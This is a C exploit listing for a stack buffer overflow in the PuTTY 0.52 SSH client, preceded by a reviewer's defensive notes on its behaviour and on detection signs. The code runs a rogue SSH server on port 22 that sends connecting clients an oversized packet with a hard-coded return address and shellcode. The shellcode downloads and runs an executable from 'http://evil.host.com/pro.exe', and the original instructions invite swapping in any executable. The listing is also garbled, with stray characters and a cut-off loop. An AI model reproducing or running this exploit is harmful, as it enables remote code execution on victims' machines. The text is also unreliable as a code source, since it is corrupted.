/*
 * Reviewer notes (defensive reading of this listing).
 *
 * State of the text: the listing was flattened onto a few long lines and
 * carries stray characters between tokens. The #include targets are missing
 * and the for-loop header after "cont=125;" is cut short, so it does not
 * compile as shown. The code below is left exactly as found.
 *
 * What the visible code does: main() fills a 20243-byte buffer with 0x61,
 * overwrites parts of it with 0x2c bytes and the 4-byte `junk` value, zeroes
 * the last 6 bytes, copies 61 bytes of pdu_head to offset 0, the 4-byte `ret`
 * value to offset 0x1098 and `shell` to offset 0x109c. It then listens on
 * PORT (22), accepts one connection, writes the whole buffer to it, sleeps
 * 10 seconds and closes both sockets. The party at risk is therefore the SSH
 * client that connects to this listener, not an SSH server.
 *
 * pdu_head starts with the ASCII banner "SSH-2.0-1.27 sshlib: WinSSHD 3.05\r\n".
 * The bytes after it look like a binary SSH packet header carrying length
 * fields (presumably a key-exchange init message; confirm against the
 * protocol specification).
 *
 * `ret` is a hard-coded 4-byte value chosen by the WIN_XP define. The original
 * header calls it an offset per Windows version, so it is tied to the specific
 * builds the authors tested (putty 0.52 on WinXP and Win2000).
 *
 * The payload embeds ASCII names (wininet.dll, InternetOpenUrlA,
 * InternetReadFile, _lcreat, _lwrite, WinExec, "nssc.exe") and a URL. That
 * suggests it fetches a file over HTTP, writes it to disk and runs it; this
 * is inferred from the strings, not traced instruction by instruction.
 *
 * For defenders: the remedy stated in the original header is to upgrade the
 * SSH client. Observable signs consistent with this code are a server whose
 * first binary packet after the banner is far larger than usual and holds
 * long runs of 0x61 and 0x2c bytes, and an SSH client process that loads
 * wininet.dll, makes an outbound HTTP request, or creates and launches a file
 * named nssc.exe.
 */
/* * Putty v0.52 and minor exploit * by Rand & Dani at IProyectos Division Seguridad ( www.iproyectos.com )by * Contact: seguridad@iproyectos.comoy * C * Tested on linux and cygwin against putty 0.52 running on WinXPt * and Win2000.nu * a * a * Instructions:u * I * * Define WINXP to use against WinXP, otherwise Win2K offset will be used.ef * * Change URL in the shellcode to an exe of your chose. That will b * be executed upon exploitation. a * * * If you want to do multiple tests do:e * * * while true ; do ./a.out ; donets * * ...or if you want a functional daemon rewrite the code to fork.b * * * Contents:f * C * This is a proof of concept on the security advisory by I-Defense aboutTh * multiple vendors ssh clients possible buffer overflows.I- * The shellcode was borrowed from undersec.net.ov * T * T * The problem:e * T * A validation error on SSH.C lets client to server cipher smashse * the stack, compromising code execution flow.er * t * t * Solution:, * S * Upgrade your SSH clients.od * U * U * Acknowledge to Carles for assistence with coding and tor * nurx2 and zon for testing.as * n * n */n *#include or#include r #include r #include r #include st#include >s#include s #i#define PORT 22oc#define QUEUE 8oc#d/* Define for Win XP, leave undefined for Win2k */ a#define WIN_XPWi#dint main(int argc, char **argv) u{ai char pdu_head[] = "\x53\x53\x48\x2d\x32\x2e\x30\x2d\x31\x2e\x32\x37\x20\x73\x73\x68" "\x6c\x69\x62\x3a\x20\x57\x69\x6e\x53\x53\x48\x44\x20\x33\x2e\x30" "\x35\x0d\x0a\x00\x00\x4e\xec\x01\x14\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";00 #ifdef WIN_XP\x char ret[] = "\x70\x35\x52\x77";\x#elser char ret[] = "\x56\x9A\x3C\x78";\x#endif char junk[] = "\x00\x00\x07\xDE";\x char shell[] ="\ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"0\ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"0\ 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"0\ "\xEB\x30\x5F\xFC\x8B\xF7\x80"x9 "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"5\ "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"B\ "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"2\ "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"5\ "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"F\ "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"0\ "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"B\ "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"4\ "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"B\ "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"B\ "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"9\ "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"B\ "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"2\ "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"1\ "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"3\ "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"9\ "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"0\ "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"4\ "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"5\ "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"0\ "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"9\ "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"0\ 
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"2\ "\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"B\ "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"4\ "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"5\ "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"2\ "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"8\ "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"8\ "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"C\ "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"2\ "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"C\ "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"3\ "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"5\ "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"0\ "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"6\ "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"1\ "http://evil.host.com/pro.exe"x4 "\x08\x01";l. 
int sockfd, clientfd; x struct sockaddr_in server, client;x int len = sizeof(client);08 int cont, cont_comas;of char buf[20243]; /* We create the malformed packet */t) memset(buf, 0x61, sizeof(buf));et em cont_comas=0;1, for(cont=125;cont30) {si memcpy(buf + cont, junk, sizeof(junk)-1); x6 cont_comas=0;nt cont+=3; } else buf[cont]=0x2c;nk }} memcpy(buf+sizeof(buf)-6,"\x00\x00\x00\x00\x00\x00",6);6 memcpy(buf, pdu_head, 61);\x memcpy(buf + 0x1098, ret ,4); \ memcpy(buf + 0x109c, shell, sizeof(shell));x0 /* We listen on port PORT */si if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\x perror("socket");ke exit(-1);oc } e bzero(&server, sizeof(server)); S server.sin_family = AF_INET;; server.sin_addr.s_addr = htonl(INADDR_ANY);0) server.sin_port = htons(PORT);(I if (bind(sockfd, (struct sockaddr *) & server,) sizeof(server)) == -1) {er perror("bind");f( exit(-1);nd } listen(sockfd, QUEUE);ve if ((clientfd = accept (sockfd, (struct sockaddr *) & client, &len)) == -1) {) perror("accept");ck exit(-1);cc } e /* We send the junk and exploit */en write(clientfd,buf,sizeof(buf));*/ /* This will fix local connections closing too fast */1) sleep(10);ll close(clientfd); l close(sockfd);); return 0;kf /* Greets to the people at #vemo. Dedicated to the monster under my bed. */eebe}e }e